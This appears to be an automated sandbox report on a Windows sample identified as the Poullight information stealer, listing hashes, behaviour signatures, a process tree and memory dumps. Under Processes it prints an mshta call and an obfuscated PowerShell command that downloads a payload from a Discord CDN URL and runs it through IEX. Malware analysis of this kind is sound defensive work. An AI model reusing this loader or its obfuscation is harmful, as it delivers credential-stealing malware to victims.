Analysis

  • max time kernel
    69s
  • max time network
    135s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    16-08-2021 16:18

General

  • Target

    eufive_20210816-144801.exe

  • Size

    482KB

  • MD5

    5ba895fb23729ffbb001e5dfe74aa132

  • SHA1

    7a2b094329f369ff5a67971c3a71c46775e93000

  • SHA256

    7fc66f244e022341520c4af91172ec3833c36b95624ee5c510086cd8d71db7ae

  • SHA512

    34ad4a38eb4983018e1c626550378ef4622be2fb02b74d1bacf9155cc835fb838a092c53b5b46e1ee45eac4ba13e723e661bb5e969480a56d2839d14d79c8cde

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/875404916150116402/875405053467459594/Minutes.txt

Signatures

  • Poullight

    Poullight is an information stealer first seen in March 2020.

  • Poullight Stealer Payload 3 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\eufive_20210816-144801.exe
    "C:\Users\Admin\AppData\Local\Temp\eufive_20210816-144801.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:856
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://cdn.discordapp.com/attachments/875404916150116402/875405147503751198/Sekonds.txt
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:2488
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://cdn.discordapp.com/attachments/875404916150116402/875405053467459594/Minutes.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2620
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3292
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3292 -s 1120
            5⤵
            • Suspicious use of NtCreateProcessExOtherParentProcess
            • Program crash
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1896

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/856-114-0x0000000000680000-0x0000000000681000-memory.dmp
    Filesize

    4KB

  • memory/2488-116-0x0000000000000000-mapping.dmp
  • memory/2620-118-0x0000000000000000-mapping.dmp
  • memory/2620-124-0x000001709F780000-0x000001709F781000-memory.dmp
    Filesize

    4KB

  • memory/2620-127-0x000001709F930000-0x000001709F931000-memory.dmp
    Filesize

    4KB

  • memory/2620-130-0x000001709EDB0000-0x000001709EDB2000-memory.dmp
    Filesize

    8KB

  • memory/2620-131-0x000001709EDB3000-0x000001709EDB5000-memory.dmp
    Filesize

    8KB

  • memory/2620-135-0x000001709EDB6000-0x000001709EDB8000-memory.dmp
    Filesize

    8KB

  • memory/2620-146-0x000001709F8E0000-0x000001709F8EE000-memory.dmp
    Filesize

    56KB

  • memory/3292-147-0x0000000000400000-0x0000000000420000-memory.dmp
    Filesize

    128KB

  • memory/3292-148-0x000000000041A94E-mapping.dmp
  • memory/3292-154-0x0000000005940000-0x0000000005941000-memory.dmp
    Filesize

    4KB

  • memory/3292-155-0x0000000005520000-0x0000000005521000-memory.dmp
    Filesize

    4KB

  • memory/3292-156-0x0000000005510000-0x0000000005511000-memory.dmp
    Filesize

    4KB

  • memory/3292-157-0x0000000005440000-0x000000000593E000-memory.dmp
    Filesize

    5.0MB

  • memory/3292-158-0x0000000005770000-0x0000000005771000-memory.dmp
    Filesize

    4KB

  • memory/3292-159-0x00000000062F0000-0x00000000062F1000-memory.dmp
    Filesize

    4KB

  • memory/3292-160-0x0000000007490000-0x0000000007491000-memory.dmp
    Filesize

    4KB